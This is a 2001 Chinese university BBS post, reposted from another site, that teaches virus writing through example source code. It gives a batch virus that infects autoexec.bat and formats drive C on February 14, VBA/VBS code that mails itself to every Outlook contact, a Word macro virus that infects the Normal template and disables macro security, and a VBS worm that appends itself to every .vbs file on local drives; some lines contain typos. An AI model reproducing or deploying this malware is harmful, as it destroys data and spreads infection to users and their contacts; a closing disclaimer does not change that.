荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: fast (平淡), 信区: Virus
标 题: 揭开病毒的冰山一角
发信站: 荔园晨风BBS站 (Wed Sep 19 18:08:24 2001), 转信
揭开病毒的冰山一角
不知是为什么最近B人想把一些我认为很能吸引人的东西写出来让大家赏析
一下,于是便有了本文。
A.一个简单例子--批处理病毒
提到批处理,谁都知道。But要用它写病毒,就不一定有人听说过了。其实
用它来写Virus是非常简单的,不信Please看下面的例程:
;病毒名称:Example.bat
;清屏并隐藏下面的操作
cls
ctty nul
if %1.==-f.shirt
:next
if not %1==*~del%1
shift
if not %.==.goto next
;下面的代码用于检查要感染的文件是否被感染过
type c:\autoexec.bat|find /i "%windir%\command\format c:
/autotext/u/select";检查有无特征码
if not errorlevel 1 goto tryvirus;有特征码转去执行tryvirus块
goto copyvirus;没有转去copyvirus块
:tryvirus
type nul>c:\todayis.dat
dir c:\todayis.dat{find"-2-14-";建立空文件todayis.dat并检查今天日期是否
是发作日期--2月14日
if not errorlevel 1 goto warw
:copyvirus
for % %f in (c:\autoexec.bat) do copy % %f+example.bat
goto tryvirus
:warw
del c:\todayis.dat
%windir%\command\format c: /autoexec/u/select;这条指令彻底毁掉你的C盘!
!
:end
del c:\todayis.dat
%windir%\win
看了上面的例程,想必各位都明白了--批处理也是可以用来写病毒的
B.更进一步
前些日子“爱虫”闹得很火,它的发送功能对某些人而言是个“奇技”,其
实这种功能是利用Outlook对象的方法来做的,这个B人相信大家一看便知其中奥
妙。(下面我们就来实现它)
Dim x, y, i, addybook, peep
Dim outlookapp, mapiname, slice
Set outlookapp = CreateObject("Outlook.Appliction")
Set mapiname = outlookapp.GetNameSpace("MAPI")
mapiname.Logon
For y = 1 To mapiname.AddressLists.Count
Set addybook = mapiname.AddressLists(y)
x = 1
Set slice = outlookapp.CreateItem(0)
For i = 1 To addybook.AddressEntries.Count
peep = addybook.AddressEntries(x)
slice.Recipients.Add peep'地址
x = x + 1
Next i
slice.Subject = "标题"
slice.Body = "内容"
slice.Attachments .Add Appliction.Name'附件
peep = ""
Next y
mapiname.Logoff
(以上代码可以用于VBA,VBS,VB中。)
C.谈谈宏病毒
说句实话B人不喜欢谈论宏病毒,because关于it的东西太多了一时talk不
完。言归正传,要写宏病毒先要明白如何感染文档,这个问题并不难解决(对
于我而言)。下面我们以Word例来解决它:
;基于安全问题本部分不加注释
Dim adim, ntim, ntcl, adcl, toin, dont, doad, bgn
Set adim = ActiveDocument.VBProject.VBComponents.Item(1)
Set ntim = NormalTemplate.VBProject.VBComponents.Item(1)
ntcl = ntim.CodeModule.CountOfLines
adcl = adim.CodeModule.CountOfLines
bgn = 2
If adim.Name <> "识别码(病毒名)" Then
If adcl > 0 Then adim.CodeModule.DeleteLines 1, adcl
Set toin = adim
adim.Name = "识别码(病毒名)"
doad = True
End If
If ntim.Name <> "识别码(病毒名)" Then
If ntcl > 0 Then ntim.CodeModule.DeleteLines 1, ntcl
Set toin = ntim
ntim.Name = "识别码(病毒名)"
dont = True
End If
If dont <> True And doad <> True Then GoTo cat
If dont = True Then
Do While adim.CodeModule.Lines(1, 1) = ""
adim.CodeModule.DeleteLines 1
Loop
toin.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While adim.CodeModule.Lines(bgn, 1) <> ""
toin.CodeModule.InsertLines bgn, adim.CodeModule.Lines(bgn, 1)
bgn = bgn + 1
Loop
bgn=2
End If
If doad = True Then
Do While ntim.CodeModule.Lines(1, 1) = ""
ntim.CodeModule.DeleteLines 1
Loop
toin.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While ntim.CodeModule.Lines(bgn, 1) <> ""
toin.CodeModule.InsertLines bgn, ntim.CodeModule.Lines(bgn, 1)
bgn = bgn + 1
Loop
bgn=2
End If
cat:
If ntcl <> 0 And adcl <> 0 And (InStr(1, ActiveDocument.Name,
"Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
If ntcl <> 0 And adcl <> 0 And (InStr(1, ActiveDocument.Name, "Document"
<> False)) Then
AdctiveDocument.Saved = True
End If
(将上述的代码放到Private Sub Document_Open()中就可以达到文档开启时
运行的目的。)
写宏病毒的第二步是要如何隐藏病毒,其方法就是要屏蔽掉与宏有关的一切
东西。(同样这里也以Word为例。)
On Error Resume Next
If System.PrivateProfileString("",
"HKEY-CURRENT-USER\Software\Microsoft\Office\9.0\word\security",
"level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY-CURRENT-USER\Software\Microsoft\Office\9.0\word\security",
"level") = 1&
Else
CommmandBars("Tools").Controls("Macro...").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
For Each mItem In CommandBars("Tools").Controls
If mItem.Caption = "自定义(C)..." Then
mItem.OnAction = "AutoClose"
End If
If mItem.Caption = "模板和加载(I)..." Then
mItem.OnAction = "AutoClose"
End If
If mItem.Caption = "选项(O)..." Then
mItem.OnAction = "AutoClose"
End If
Next mItem
For Each cItem In CommandBars("Tools").Controls
If cItem.Type = msoControlPopup Then
If cItem.Caption = "宏(M)" Then
For Each mItem In cItem.CommandBars.Controls
If mItem.Caption = "宏(M)..." Then
mItem.OnAction = "AutoClose"
End If
If mItem.Caption = "Visual Basci 编辑器(V)" Then
mItem.OnAction = "AutoClose"
End If
Next mItem
End If
End If
Next cItem
For Each cItem In CommandBars("Visual Basic").Controls
cItem.OnAction = "AutoClose"
Next cItem
关于宏病毒我们就到此为止了。至于避免重复感染等等内容并不难实现,
相信大家可以独自解决。
D.尾声
为了让大家更好了解病毒,这里B人给出一个良性VBS病毒的源代码。
On Error Resume Next
Dim known
Set known = CreateObject("WScript.shell")
If known.RegRead("HKEY_CURREN_USER\Phoenix1.0a", "vbs") <> "die" Then
Dim x, y, i, addybook, peep
Dim outlookapp, mapiname, slice
Set outlookapp = CreateObject("Outlook.Appliction")
Set mapiname = outlookapp.GetNameSpace("MAPI")
mapiname.Logon
For y = 1 To mapiname.AddressLists.Count
Set addybook = mapiname.AddressLists(y)
x = 1
Set slice = outlookapp.CreateItem(0)
For i = 1 To addybook.AddressEntries.Count
peep = addybook.AddressEntries(x)
slice.Recipients.Add peep
x = x + 1
Next i
slice.Subject = "Hello!"
slice.Body = "please open it"&Appliction.Name
slice.Attachments.Add Appliction.Name
peep = ""
Next y
mapiname.Logoff
Dim objfso As New Scripting.FileSystemObject
Dim drvloop As Scripting.Drive
For Each drvloop In objfso.Drives
If drvloop.DriveType = Fixed Or drvloop.IsReady Then
If drvloop.DriveType = 3 Then
virussafe drvloop.driveletter&":\"
End If
End If
Next drvloop
Set objfso = Nothing
known.RegWrite("HKEY_CURREN_USER\Phoenix1.0a\vbs","die",REG_STRING)
Else
End
End If
Sub virussafe(strpath As String)
Dim objfolder As Scripting.Folder
Dim objfile As Scripting.File
Dim objsubdirs As Scripting.Folders
Dim sobj As Scripting.FileSystemObject
Dim sobjv, c, fs
Dim a As String
Dim ca As Scripting.TextStream
Dim objloopfolder As Scripting.Folder
Set fs = CreateObject("Scripting.FileSystemObject")
Set ca = fs.GetFile(Appliction.Name)
Set c = ca.OpenTextStream(1, -2)
a = c.ReadAll
c.Close
Set sobjv = CreateObject("Scripting.FileSystemObject")
Set sobj = New Scripting.FileSystemObject
Set objfolder = sobj.GetFolder(strpath)
For Each objfile In objfolder.Files
If UCase$(Right$(objfile.ShortPath, 4)) = ".vbs" Then
If objfile.Path <> Appliction.Name Then
sobjv.OpenTexTFile(objfile.Path,8,-2)
sobjv.Write a
sobjv.Close
End If
End If
Next objfile
Set objsubdirs = objfolder.SubFolders
For Each objloopfolder In objsubdirs
virussafe objloopfolder.Path
Next objloopfolder
Set objsubdirs = Nothing
Set objfolder = Nothing
End Sub
E.最后声明
练武之人讲究武德,编程之人也不可倚仗自己的知识胡为。本文只为揭开病
毒的冰山一角以满足一些人的好奇心。以上给出的代码仅供参考,不得乱用。
慎之!!!!
慎之!!!!
文章出处:第八军团
文章作者:JunTuan
--
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.0.127]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店